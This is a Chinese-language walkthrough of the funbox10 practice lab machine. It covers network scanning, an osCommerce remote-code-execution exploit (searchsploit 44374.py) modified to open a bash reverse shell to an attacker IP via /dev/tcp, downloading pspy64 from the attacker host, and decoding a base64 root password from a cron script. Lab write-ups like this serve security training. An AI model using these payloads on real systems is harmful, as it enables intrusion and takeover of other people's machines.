funbox10靶机(命令执行漏洞)

环境准备

靶机链接:百度网盘 请输入提取码

提取码:v4in

虚拟机网络链接模式:桥接模式

攻击机系统:kali linux 2021.1

信息收集

1.探测目标靶机 arp-scan -l

funbox10靶机(命令执行漏洞)_第1张图片

2.探测目标靶机开放端口和服务情况

nmap -p- -A -T4 192.168.1.100

funbox10靶机(命令执行漏洞)_第2张图片

3.用gobuster对80端口进行目录探测

gobuster dir -u http://192.168.1.100 \ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 50 -x php,txt,html,js,php.bak,txt.bak,html.bak,json,git,git.bak,zip,zip.bak

funbox10靶机(命令执行漏洞)_第3张图片

漏洞利用

1.查看页面

funbox10靶机(命令执行漏洞)_第4张图片

 

2.对扫出的catalog目录进行访问,并且发现其版本号

funbox10靶机(命令执行漏洞)_第5张图片

3.用kali自动工具进行漏洞探测 searchsploit oscommerce

4.我们用远程代码执行漏洞的44374.py ,并且查看内容

funbox10靶机(命令执行漏洞)_第6张图片

5.把base_url改为靶机地址,进行访问,网页给出的是一个ls 命令的结果(29行)

funbox10靶机(命令执行漏洞)_第7张图片

6.这次我们把29行改为 ls -l /bin ,再次访问

funbox10靶机(命令执行漏洞)_第8张图片

7.这次把命令换为一个可以反弹shell的命令,观察这是php网页,所以执行命令也是用php支持执行的(谷歌php执行命令函数),我们用shell-exec , bash -c 是执行的意思

"shell-exec('bash -c \"bash -i >& /dev/tcp/192.168.1.106/4444 0>&1\"');"

funbox10靶机(命令执行漏洞)_第9张图片

funbox10靶机(命令执行漏洞)_第10张图片

8.访问页面,shell回弹成功

funbox10靶机(命令执行漏洞)_第11张图片

权限提升

1.没有可利用的信息和文件,我选择上传本地脚本进行探测(github里有pspy64)

wget http://192.168.1.106:8000/pspy64

2.检测出一个自动任务的脚本(大概5.6分钟才能看到)

3.查看下内容发现有一段base64加密的信息

funbox10靶机(命令执行漏洞)_第12张图片

4.经过解密后 ,发现密码 //-d参数是解密

echo 'LXUgcm9vdCAtcCByZnZiZ3QhIQ==' | base64 -d

-u root -p rfvbgt!!

funbox10靶机(命令执行漏洞)_第13张图片

5.尝试登录root用户,成功登录,顺利拿下!!!

funbox10靶机(命令执行漏洞)_第14张图片

你可能感兴趣的:(Box系列,centos,linux,安全)